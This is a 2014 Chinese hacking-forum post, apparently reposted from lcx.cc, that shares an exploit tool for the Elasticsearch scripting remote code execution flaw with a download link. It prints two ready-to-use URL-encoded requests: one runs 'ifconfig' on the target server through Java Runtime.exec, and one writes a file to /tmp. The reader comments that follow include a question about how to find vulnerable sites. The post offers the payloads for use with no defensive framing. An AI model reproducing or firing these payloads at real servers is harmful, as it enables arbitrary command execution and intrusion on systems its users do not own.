Elasticsearch 代码执行漏洞利用工具
园长 (乱码你好,乱码再见。) | 2014-05-22 21:12
Elasticsearch_fat.jar,备用地址:http://pan.baidu.com/s/1sjPjA0X
相关:http://bouk.co/blog/elasticsearch-rce/、http://wooyun.org/bugs/wooyun-2014-061672
家里交不起网费了,如果工具有bug利用下面的代码就没什么问题了。
利用代码:
http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;nimport%20java.io.*;nString%20str%20=%20%22%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(%22ifconfig%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}
http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;nimport%20java.io.*;nFile%20f%20=%20new%20File(%22/tmp/12.txt%22);if(f.exists()){%22exists%22.toString();}BufferedWriter%20bw%20=%20new%20BufferedWriter(new%20OutputStreamWriter(new%20FileOutputStream(f),%22UTF-8%22));bw.write(%221233%22);bw.flush();bw.close();if(f.exists()){%22success%22.toString();}%22}}}
FROM:http://p2j.cn/?p=1300
各种吐槽:
1#
lucky (一天一洞) | 2014-05-22 21:15
看看,学习一下
2#
j2ck3r (我家里人什么都不知道。) | 2014-05-22 21:22
如何判断有这个漏洞的网站
3#
小夜 | 2014-05-22 21:26
表示不知道这漏洞是啥 能否 写一篇文章分析分析 谢谢了 哈哈
4#
园长 (乱码你好,乱码再见。) | 2014-05-22 21:46
@小夜 没法上网,细节参考下上面给出的连接嘛。
5#
j2ck3r (我家里人什么都不知道。) | 2014-05-22 21:59
@园长 完全看不懂 求详细分析
6#
淡漠天空 | 2014-05-22 22:06
http://baike.baidu.com/view/8005387.htm?fr=aladdin
不行了再用这个。。。。
7#
乐斗菜菜 | 2014-05-22 22:13
好人啊,喜欢无私奉献
8#
Z-0ne (一个很懒的人) | 2014-05-22 23:08
一大波刷分即将靠近
留言评论(旧系统):
文章来源于lcx.cc:Elasticsearch 代码执行漏洞利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论